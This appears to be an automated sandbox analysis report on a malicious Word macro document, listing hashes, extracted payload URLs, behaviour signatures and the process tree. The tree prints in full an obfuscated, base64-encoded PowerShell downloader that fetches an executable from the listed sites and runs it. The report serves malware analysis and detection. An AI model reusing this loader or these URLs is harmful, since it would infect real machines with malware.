Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-09-2024 06:32
Behavioral task
behavioral1
Sample
eac3e0b94509698289bda8b3c99eee88_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
eac3e0b94509698289bda8b3c99eee88_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
eac3e0b94509698289bda8b3c99eee88_JaffaCakes118.doc
-
Size
155KB
-
MD5
eac3e0b94509698289bda8b3c99eee88
-
SHA1
5f6f31c9736f201b0ddbb36a6c079e6b8e2516a6
-
SHA256
807391e7d966a61e58ac7b3362dc046433dea4bf6ce1b4be4f6e401816cb4d30
-
SHA512
02119d24f0b89a1352851c8362eb4a3f267d24482eb833f22abf26d722b6d54f379c4ec6b59e980469100bffd72db031bde3e930ad93106b9837f3b89d2651d7
-
SSDEEP
1536:gURA+F6URA+Fhrdi1Ir77zOH98Wj2gpngd+a91xQIY0y+WbZw:frfrzOH98ipgtxDH7AZw
Malware Config
Extracted
http://qstride.com/img/1W/
http://syracusecoffee.com/customer/i/
http://shahrakyar.com/cms/3e/
http://vuatritue.com/wp-admin/FkX/
http://glafka.com/wp-content/2L7/
http://rovrooftiles.com/wp-includes/nDP/
http://paulospainting.com/wp-includes/7k/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2824 2900 powershell.exe 31 -
Blocklisted process makes network request 10 IoCs
flow pid Process 5 2824 powershell.exe 7 2824 powershell.exe 8 2824 powershell.exe 10 2824 powershell.exe 11 2824 powershell.exe 12 2824 powershell.exe 17 2824 powershell.exe 18 2824 powershell.exe 19 2824 powershell.exe 21 2824 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{27E80C78-A6A1-4EF9-9BEA-227D361070EB}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{27E80C78-A6A1-4EF9-9BEA-227D361070EB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{27E80C78-A6A1-4EF9-9BEA-227D361070EB}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{27E80C78-A6A1-4EF9-9BEA-227D361070EB}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{27E80C78-A6A1-4EF9-9BEA-227D361070EB}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2308 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2824 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2308 WINWORD.EXE 2308 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2308 wrote to memory of 484 2308 WINWORD.EXE 35 PID 2308 wrote to memory of 484 2308 WINWORD.EXE 35 PID 2308 wrote to memory of 484 2308 WINWORD.EXE 35 PID 2308 wrote to memory of 484 2308 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eac3e0b94509698289bda8b3c99eee88_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABJAGEAOQBpAGEANQA2AD0AKAAnAEYAJwArACcANwAnACsAKAAnAGIAcgBtACcAKwAnAGQANwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAHIATwBGAEkAbABFAFwARABnAGcATQBPADkAMQBcAFAAZABOAG8AVQBPAGMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAcgBJAGAAVAB5AFAAYABSAGAATwB0AG8AQwBvAEwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwArACcALAAgAHQAbAAnACkAKwAnAHMAJwArACcAMQAnACsAKAAnADEALAAnACsAJwAgACcAKQArACgAJwB0AGwAJwArACcAcwAnACkAKQA7ACQAUwByAGwAegBhAGsAYgAgAD0AIAAoACgAJwBMACcAKwAnAHUAdwAnACkAKwAoACcAZgBoACcAKwAnADMAXwAnACkAKwAnAHQAJwApADsAJABTAG0AaAA4AGwAbwBsAD0AKAAoACcASAAnACsAJwBuAF8AJwApACsAJwBuADUAJwArACcAbQBsACcAKQA7ACQATABvAG4AOABrAGsAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBDACcAKwAnAFYAVQAnACsAKAAnAEQAZwAnACsAJwBnACcAKQArACcAbQAnACsAKAAnAG8AOQAnACsAJwAxAEMAVgAnACsAJwBVAFAAZABuACcAKwAnAG8AdQAnACkAKwAoACcAbwAnACsAJwBjAEMAVgAnACkAKwAnAFUAJwApACAALQBSAGUAUABMAGEAQwBFACAAIAAoACcAQwBWACcAKwAnAFUAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKwAkAFMAcgBsAHoAYQBrAGIAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABWAGYAcwA3AGkAawBzAD0AKAAoACcAVwA5ACcAKwAnAF8AMwA5ACcAKQArACcANQAnACsAJwB1ACcAKQA7ACQASwBwAG4AbwB3AG4AMgA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAAbgBlAHQALgB3AGUAYgBjAGwASQBFAG4AVAA7ACQAUAA3ADUAMgAwAHkAMwA9ACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKQArACgAJwAvACcAKwAnAHEAcwB0ACcAKwAnAHIAaQAnACsAJwBkAGUALgBjAG8AbQAnACsAJwAvAGkAbQAnACkAKwAnAGcALwAnACsAKAAnADEAJwArACcAVwAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvACcAKwAnAC8AcwB5ACcAKwAnAHIAJwArACcAYQBjAHUAcwBlAGMAbwBmAGYAZQBlACcAKwAnAC4AJwApACsAJwBjAG8AJwArACcAbQAvACcAKwAoACcAYwB1AHMAJwArACcAdAAnACkAKwAoACcAbwBtACcAKwAnAGUAJwApACsAKAAnAHIAJwArACcALwBpACcAKwAnAC8AKgBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6AC8AJwApACsAJwAvAHMAJwArACgAJwBoAGEAaAAnACsAJwByACcAKQArACgAJwBhAGsAeQBhAHIALgAnACsAJwBjAG8AbQAvAGMAJwArACcAbQBzACcAKQArACcALwAzACcAKwAnAGUALwAnACsAJwAqAGgAJwArACgAJwB0AHQAcAA6ACcAKwAnAC8AJwApACsAJwAvAHYAJwArACcAdQBhACcAKwAoACcAdAByACcAKwAnAGkAJwApACsAJwB0ACcAKwAnAHUAZQAnACsAKAAnAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAAJwApACsAJwAtAGEAJwArACgAJwBkAG0AaQAnACsAJwBuAC8AJwApACsAKAAnAEYAJwArACcAawBYACcAKQArACgAJwAvACcAKwAnACoAJwArACcAaAB0AHQAcAA6AC8ALwBnACcAKQArACgAJwBsAGEAJwArACcAZgBrAGEAJwArACcALgAnACkAKwAnAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACsAKAAnAHAAJwArACcALQBjACcAKwAnAG8AbgB0AGUAbgB0ACcAKwAnAC8AJwApACsAKAAnADIATAA3AC8AKgAnACsAJwBoAHQAJwApACsAJwB0AHAAJwArACgAJwA6AC8ALwByACcAKwAnAG8AJwArACcAdgByACcAKQArACcAbwAnACsAKAAnAG8AZgB0AGkAbABlACcAKwAnAHMALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAcAAnACkAKwAnAC0AJwArACgAJwBpAG4AYwAnACsAJwBsACcAKQArACcAdQBkACcAKwAoACcAZQAnACsAJwBzAC8AJwArACcAbgBEAFAALwAqAGgAJwApACsAKAAnAHQAdABwADoAJwArACcALwAvAHAAJwApACsAKAAnAGEAdQAnACsAJwBsACcAKwAnAG8AcwBwAGEAaQBuAHQAJwApACsAJwBpAG4AJwArACgAJwBnAC4AYwBvACcAKwAnAG0AJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGkAbgBjACcAKwAnAGwAJwApACsAKAAnAHUAZABlAHMALwA3ACcAKwAnAGsALwAnACkAKQAuACIAUwBwAGAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABLAHUAawBzAHkAcQA3AD0AKAAnAFMAYwAnACsAJwBiACcAKwAoACcAMQA4ACcAKwAnAGYAeAAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFUAcwA4ADIAbABvAGQAIABpAG4AIAAkAFAANwA1ADIAMAB5ADMAKQB7AHQAcgB5AHsAJABLAHAAbgBvAHcAbgAyAC4AIgBEAGAATwB3AE4ATABgAE8AYQBkAEYASQBMAGUAIgAoACQAVQBzADgAMgBsAG8AZAAsACAAJABMAG8AbgA4AGsAawB6ACkAOwAkAEkANQBuAHgAcgB4AHAAPQAoACcAVgAnACsAKAAnAF8AYQAnACsAJwBuACcAKQArACgAJwBwACcAKwAnAHUAcgAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABMAG8AbgA4AGsAawB6ACkALgAiAEwARQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMgA5ADYAMAAxACkAIAB7AC4AKAAnAEkAJwArACcAbgAnACsAJwB2AG8AawBlAC0ASQB0ACcAKwAnAGUAbQAnACkAKAAkAEwAbwBuADgAawBrAHoAKQA7ACQAWQA5AGoAYwA0AHkAbwA9ACgAJwBCAGcAJwArACgAJwBnAGkANAAnACsAJwBsACcAKQArACcAMQAnACkAOwBiAHIAZQBhAGsAOwAkAFUAcgBlAHEAOQB2ADQAPQAoACcAVwB4ACcAKwAoACcAeQBwACcAKwAnAHQAJwApACsAJwBiAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABPADcAOQBpAG8AZgBzAD0AKAAnAFoAJwArACgAJwBvAHAAcgAnACsAJwBqACcAKQArACcAaABjACcAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD59ce3613fd1c2b47c238563a4eb4b0a30
SHA1f552a00a0406385d956a15560b4162fa108f6308
SHA256ccab5534256aac03ebba94952e1efef38c1f5f616f8f6ecb0255aae7668e238a
SHA512f4464a8c459af26d3d9660251271dbd64e0b75ea031e0c72621af7ca2184b48057c87dec538ae7b4398076cc729ca87d663a0bdea530d61b38b3d431ee82cc1d